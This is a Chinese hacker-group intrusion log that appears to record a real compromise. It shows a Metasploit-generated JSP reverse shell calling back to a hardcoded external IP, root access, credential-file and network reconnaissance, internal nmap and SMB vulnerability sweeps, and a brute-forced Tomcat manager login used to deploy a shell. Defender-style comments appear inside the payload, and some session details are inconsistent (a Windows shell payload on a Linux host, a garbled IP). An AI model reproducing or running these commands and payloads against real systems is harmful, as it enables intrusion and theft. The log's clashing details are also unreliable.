|
草尼马入侵记- 杜秋娘劝君莫惜金缕衣
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
| (・´ェ`・) ========>我是草拟吗
|
| 我就是传说中的九区四神兽之草尼马 哦YE 刘庆算个P 。
| 九区万岁 。。。。 。。 。。。 。。 。。 。。 。。 。
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------[get shell]-------------------------------------------
root@DIs9Team:/tmp# /opt/framework-3.7.1/msf3/msfpayload java/jsp_shell_reverse_tcp LHOST=222.219.175.71 R > fuck.jsp
root@DIs9Team:/tmp# cat fuck.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%--
  Reverse-shell page emitted by the msfpayload command shown above this
  listing (java/jsp_shell_reverse_tcp). Any HTTP request that reaches this
  page makes the servlet container itself dial out to the hardcoded IP:port
  in the scriptlet below and wire that socket to a freshly spawned command
  interpreter, so whoever holds the listening end gets a shell running as the
  container's own user (uid 0 in the session log further down this page).

  Defender notes, all grounded in what this file does:
  - Artefact: a .jsp (or the .war that wraps it) that was never part of a
    sanctioned deployment, sitting in the container's webapps tree.
  - Network: an outbound TCP connection opened by the java process to a
    non-service port on an external address (here 222.219.175.71:4444).
  - Host: the java process spawning cmd.exe / a shell as a child process.
  - Mitigation: do not run the servlet container as root, and remove the
    manager application's default credentials (this page later shows a
    Tomcat manager login with tomcat/tomcat) so pages like this cannot be
    deployed in the first place.
--%>
<% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
// Pump each chunk straight through and flush; the loop ends when read()
// returns 0 or -1 (peer closed or interpreter exited).
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
// Best-effort close of whichever readers/writers were actually created;
// errors are swallowed here exactly as in the copy loop above.
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
// Page body: connect back, spawn the interpreter, and cross-wire the two
// streams in both directions. Every exception is swallowed, so a failed
// connection or exec is neither reported in the HTTP response nor logged
// by this code.
try
{
// Hardcoded call-back endpoint; matches the handler session shown on this
// page (222.219.175.71:4444).
Socket socket = new Socket( "222.219.175.71", 4444 );
// NOTE(review): the interpreter is hardcoded to cmd.exe, yet the uname
// output on this page shows the compromised host is Linux; how a Linux
// shell was obtained from this exact file is not reconstructible from the
// page — TODO confirm the payload options actually used.
Process process = Runtime.getRuntime().exec( "cmd.exe" );
// interpreter stdout -> socket, and socket -> interpreter stdin
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
||||||||||||||||||||||||||||||||||| upload jsp shell |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
start ---------------------------------------------- M E T A S P L O I T --------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 222.219
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
root@DIs9Team:/tmp# wget http://1.1.1.1/fuck.jsp
[*] Command shell session 1 opened ( 222.219.175.71:4444 -> XXXXXXXX:42957)
-bash-3.2# id
uid=0(root) gid=0(root) groups=0(root) context=user_u:system_r:unconfined_t
-------------------------------------------[get shell end]-------------------------------------------
-------------------------------------------[pc info]-------------------------------------------
-bash-3.2# uname -a
Linux opac 2.6.18-194.el5xen #1 SMP Tue Mar 16 22:01:26 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
-bash-3.2# cat /proc/version
Linux version 2.6.18-194.el5xen (mockbuild@x86-005.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Mar 16 22:01:26 EDT 2010
-bash-3.2# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:64:24:AC:50
inet addr:192.168.1.12 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21a:64ff:fe24:ac50/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:88546048 errors:0 dropped:0 overruns:0 frame:0
TX packets:77746999 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:51976380102 (48.4 GiB) TX bytes:45171552927 (42.0 GiB)
eth1 Link encap:Ethernet HWaddr 00:1A:64:24:AC:52
inet addr:202.107.212.148 Bcast:202.107.212.159 Mask:255.255.255.240
inet6 addr: fe80::21a:64ff:fe24:ac52/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2188126 errors:0 dropped:0 overruns:0 frame:0
TX packets:2862332 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:506663282 (483.1 MiB) TX bytes:3007535978 (2.8 GiB)
Interrupt:16 Memory:ca000000-ca012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:130439 errors:0 dropped:0 overruns:0 frame:0
TX packets:130439 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:10367740 (9.8 MiB) TX bytes:10367740 (9.8 MiB)
peth0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:88691788 errors:0 dropped:0 overruns:0 frame:0
TX packets:98546280 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52340205266 (48.7 GiB) TX bytes:46942019318 (43.7 GiB)
Interrupt:21 Memory:ce000000-ce012800
vif0.0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:77747014 errors:0 dropped:0 overruns:0 frame:0
TX packets:88546061 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:45171552092 (42.0 GiB) TX bytes:51976384386 (48.4 GiB)
virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:544 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:28659 (27.9 KiB)
xenbr0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:622680 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47685004 (45.4 MiB) TX bytes:0 (0.0 b)
-bash-3.2# cat /root/.ssh/known_hosts
192.168.1.13 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtZSwDPgZUH17xTKu/Gunjwhrv67Kwhz1xnj3Y1owKVpEkSJVqAGr2/StFyFXPK0fJutYiidL1wm0ul9HjZoXh5szj6jEGNw/nNE++KdXECGlr0EPmIrt3OULjyVIlx3o7ifG4DrEB8avQz35kz4Ii6yPSIm5RT7+xyM+5kOhcQP/CUByTEB+npbhlgQv66ONRY02jAsCxuFsNplz9De4x19ri8lgm/tS13G7u/awi/7dkKgs/mSUAxCOqjtdSRMrwWg6C9wBRsGmwi0Ntdp6TwZ5ha9yFzdV3G2qRSXk0NLSAdUBgUR8/XEcFsiK+MmWcxLf9w0C+6yV3mAlxCEw5w==
-------------------------------------------[pc info end]-------------------------------------------
-------------------------------------------[nmap scan]---------------------------------------------------
-bash-3.2# yum install nmap
-bash-3.2# nmap 192.168.1.1-255 -p 22 > 22.port
-bash-3.2# cat 22.port |grep Nmap scan report for
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.7
Nmap scan report for 192.168.1.8
Nmap scan report for 192.168.1.10
Nmap scan report for 192.168.1.12
Nmap scan report for 192.168.1.13
Nmap scan report for 192.168.1.14
Nmap scan report for 192.168.1.15
Nmap scan report for 192.168.1.19
Nmap scan report for 192.168.1.20
Nmap scan report for 192.168.1.21
Nmap scan report for 192.168.1.22
Nmap scan report for 192.168.1.23
Nmap scan report for 192.168.1.40
Nmap scan report for 192.168.1.41
Nmap scan report for 192.168.1.42
Nmap scan report for 192.168.1.50
Nmap scan report for 192.168.1.51
Nmap scan report for 192.168.1.61
Nmap scan report for 192.168.1.62
Nmap scan report for 192.168.1.63
Nmap scan report for 192.168.1.64
Nmap scan report for 192.168.1.65
Nmap scan report for 192.168.1.66
Nmap scan report for 192.168.1.67
Nmap scan report for 192.168.1.80
Nmap scan report for 192.168.1.100
Nmap scan report for 192.168.1.103
Nmap scan report for 192.168.1.145
Nmap scan report for 192.168.1.250
Nmap scan report for 192.168.1.251
Nmap scan report for 192.168.1.254
-bash-3.2# nmap 192.168.1.1-255 -p 445 | grep Nmap
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 09:28 CST
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.7
Nmap scan report for 192.168.1.8
Nmap scan report for 192.168.1.10
Nmap scan report for 192.168.1.12
Nmap scan report for 192.168.1.13
Nmap scan report for 192.168.1.14
Nmap scan report for 192.168.1.15
Nmap scan report for 192.168.1.19
Nmap scan report for 192.168.1.20
Nmap scan report for 192.168.1.21
Nmap scan report for 192.168.1.22
Nmap scan report for 192.168.1.23
Nmap scan report for 192.168.1.40
Nmap scan report for 192.168.1.41
Nmap scan report for 192.168.1.42
Nmap scan report for 192.168.1.50
Nmap scan report for 192.168.1.51
Nmap scan report for 192.168.1.61
Nmap scan report for 192.168.1.62
Nmap scan report for 192.168.1.63
Nmap scan report for 192.168.1.64
Nmap scan report for 192.168.1.65
Nmap scan report for 192.168.1.66
Nmap scan report for 192.168.1.67
Nmap scan report for 192.168.1.80
Nmap scan report for 192.168.1.100
Nmap scan report for 192.168.1.103
Nmap scan report for 192.168.1.145
Nmap scan report for 192.168.1.250
Nmap scan report for 192.168.1.251
Nmap scan report for 192.168.1.254
Nmap done: 255 IP addresses (34 hosts up) scanned in 1.84 seconds
-bash-3.2# nmap --script smb-check-vulns.nse -p445 192.168.1.1-254 > 445.port
-bash-3.2# cat 445.port
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 09:29 CST
Nmap scan report for 192.168.1.1
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:6E:C7:76:80 (Asustek Computer)
Nmap scan report for 192.168.1.2
Host is up (0.00068s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:87:BB:5D (VMware)
Nmap scan report for 192.168.1.4
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:81:21:35 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.7
Host is up (0.00023s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:23:8D:0F (IBM)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
| | If you know the remote system is Windows, try rebooting it and scanning
| |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.8
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:4F:3B:F9:64 (Dell)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.10
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:DD:3D:D4 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.12
Host is up (0.000068s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.13
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 84:2B:2B:6C:87:4F (Dell)
Nmap scan report for 192.168.1.14
Host is up (0.00023s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:53:0B:40 (IBM)
Nmap scan report for 192.168.1.15
Host is up (0.00021s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:10:83:F9:3D:3A (Hewlett-packard Company)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.19
Host is up (0.00016s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:19:21:77:A1:A2 (Elitegroup Computer System Co.)
Nmap scan report for 192.168.1.20
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:90:FB:23:30:90 (Portwell)
Nmap scan report for 192.168.1.21
Host is up (0.00016s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:53:0B:CE (IBM)
Nmap scan report for 192.168.1.22
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:25:11:6D:A6:E3 (Elitegroup Computer System CO.)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE (likely by Conficker)
| Conficker: Likely INFECTED (by Conficker.C or lower)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.23
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:53:0B:84 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.40
Host is up (0.00020s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:F3:03:B0:74 (Asustek Computer)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.41
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:10:5C:CE:78:03 (Quantum Designs (h.k.))
Nmap scan report for 192.168.1.42
Host is up (0.0034s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:40:05:11:D0:35 (ANI Communications)
Nmap scan report for 192.168.1.50
Host is up (0.00100s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:C0:DD:13:4C:6B (QLogic)
Nmap scan report for 192.168.1.51
Host is up (0.00099s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:C0:DD:13:48:EC (QLogic)
Nmap scan report for 192.168.1.61
Host is up (0.00032s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:5B:3C (IBM)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: EOF
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.62
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:5D:D4 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.63
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:61:E0 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.64
Host is up (0.00013s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:C8:69:9A (IBM)
Nmap scan report for 192.168.1.65
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: E4:1F:13:E5:EC:2C (IBM)
Nmap scan report for 192.168.1.66
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: E4:1F:13:E5:EC:60 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.67
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: E4:1F:13:E5:EB:40 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.80
Host is up (0.00032s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 44:37:E6:15:62:B0 (Hon Hai Precision Ind.Co.Ltd)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.100
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A3:09:94 (Realtek Semiconductor)
Nmap scan report for 192.168.1.103
Host is up (0.0019s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:40:05:47:34:93 (ANI Communications)
Nmap scan report for 192.168.1.145
Host is up (0.00055s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:22:15:98:43:61 (Asustek Computer)
Nmap scan report for 192.168.1.250
Host is up (0.00010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:18:E1:56 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.251
Host is up (0.000093s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:DD:3A:20 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.254
Host is up (0.0096s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:24:50:50:9A:C1 (Cisco Systems)
Nmap done: 254 IP addresses (34 hosts up) scanned in 53.91 seconds
-------------------------------------------[nmap scan end ]---------------------------------------------------
-------------------------------------------[install metasploit ]---------------------------------------------------
-bash-3.2# yum install -y readline
-bash-3.2# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p22.tar.bz2
-bash-3.2# wget http://rubyforge.org/frs/download.php/38646/rubygems-1.2.0.tgz
-bash-3.2# gem install -v=1.2.2 rails
-bash-3.2# wget http://updates.metasploit.com/data/releases/framework-3.7.1-linux-x64-mini.run
-------------------------------------------[install metasploit end ]---------------------------------------------------
-------------------------------------------[pentest start]-------------------------------------------------------------
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 10:17 CST
Nmap scan report for 192.168.1.250
Host is up (0.00015s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
80/tcp open http
|_http-title: [admin login]
| http-methods: Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-favicon: Apache Tomcat
82/tcp closed xfer
139/tcp open netbios-ssn
445/tcp open microsoft-ds
801/tcp open device
8080/tcp closed http-proxy
8081/tcp open blackice-icecap
MAC Address: 00:14:5E:18:E1:56 (IBM)
Device type: general purpose
Running: Microsoft Windows 2003|XP
OS details: Microsoft Windows Server 2003 SP2, Microsoft Windows XP SP2 or Server 2003 SP2
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: SYS3650, NetBIOS user: , NetBIOS MAC: 00:14:5e:18:e1:56 (IBM)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| Name: WORKGROUP\SYS3650
|_ System time: 2011-06-16 10:04:43 UTC+8
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
///////////////////////////// sir look Apache Tomcat///////////////////////////////
msf > search tomcat
[*] Searching loaded modules for pattern 'tomcat'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
Exploits
========
Name Rank Description
---- ---- -----------
multi/http/tomcat_mgr_deploy excellent Apache Tomcat Manager Application Deployer Upload and Execute
test/cmdweb normal Command Stager Web Test
msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.250
RHOSTS => 192.168.1.250
msf auxiliary(tomcat_mgr_login) > set RPORT 8080
RPORT => 8080
msf auxiliary(tomcat_mgr_login) > exploit
[*] 192.168.1.250:8080 - Trying username:'admin' with password:''
[-] http://192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.1.250:8080 - Trying username:'manager' with password:''
[.............................]
[+] 192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.1.250:8080 - Trying username:'both' with password:'admin'
[-] http://192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.1.250:8080 - Trying username:'both' with password:'manager'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
///////////////////////////////////////Le user/password : tomcat/tomcat ///////////////////////////////////////////////////////////
msf auxiliary(tomcat_mgr_login) > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.250
RHOST => 192.168.1.250
msf exploit(tomcat_mgr_deploy) > set RPORT 8080
RPORT => 8080
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1661 bytes as UtvTM0INjXw0aXB6s124uRgFcFJFC.war ...
[*] Executing /UtvTM0INjXw0aXB6s124uRgFcFJFC/ZgQyJOeA6f8TWG2.jsp...
[*] Undeploying UtvTM0INjXw0aXB6s124uRgFcFJFC ...
[*] Command shell session 1 opened (1192.168.1.250:49012 -> 192.168.1.12:4444) ----------
------------------
------------------
look
Nmap scan report for 192.168.1.250
Host is up (0.00010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:18:E1:56 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
你 懂 的 ┏┓ ┏┓
┏━━┛┻━━━┛┻━━┓
┃ 王 ┃
┃ ━ ┃
┃ ┳━┛ ┗━┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━━┓ ┏━━┛
┃ ┃
┃ ┃
┃ ┗━━━━━┓
┃ ┣┓
┃ ┏┛
┗━┓┓┏━━━┳┓┏━┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
|